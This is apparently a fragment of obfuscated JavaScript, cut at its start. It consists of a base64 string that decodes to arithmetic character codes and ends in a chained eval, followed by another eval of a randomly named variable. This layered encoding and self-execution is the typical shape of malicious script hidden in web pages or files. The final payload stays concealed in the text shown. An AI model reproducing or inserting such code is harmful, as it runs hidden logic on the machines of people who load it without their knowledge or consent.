LSA4LCAxOCAtIDgsIDExOSAtIDEsIDEwMCAtIDMsIDExNyAtIDMsIDQwIC0gOCwgMTA4IC0gOCwgMTAyIC0gMSwgMTA1IC0gNiwgMzMgLSAxLCA2MyAtIDIsIDM1IC0gMywgMTI4IC0gOCwgMTE4IC0gNywgMTE3IC0gMywgMTAzIC0gOCwgMTA0IC0gMywgMTE4IC0gOCwgMTAwIC0gMSwgNDYgLSA2LCA5OSAtIDIsIDEyMCAtIDQsIDExNSAtIDQsIDEwMCAtIDIsIDQzIC0gMywgMTA1IC0gNCwgMTEzIC0gMywgMTA2IC0gNywgMTA5IC0gOCwgMTAxIC0gMSwgNDYgLSA1LCA0NSAtIDEsIDM0IC0gMiwgMTEwIC0gMywgMTA3IC0gNiwgMTI4IC0gNywgNDggLSA3LCA2NyAtIDgsIDE1IC0gNSwgNDYgLSA2LCAxMTIgLSAyLCAxMDIgLSAxLCAxMjUgLSA2LCAzNiAtIDQsIDczIC0gMywgMTIzIC0gNiwgMTE2IC0gNiwgMTAwIC0gMSwgMTIxIC0gNSwgMTEwIC0gNSwgMTE4IC0gNywgMTExIC0gMSwgNDMgLSAzLCAxMDMgLSAzLCAxMTAgLSA5LCAxMDQgLSA1LCA0NiAtIDUsIDQ3IC0gNiwgNDQgLSA0LCA0MiAtIDEsIDYyIC0gMywgMTUgLSA1LCAxOSAtIDkpO2V2YWwoTkxTRE1CUVhFSik7’);
eval(OJCQZPVISJ);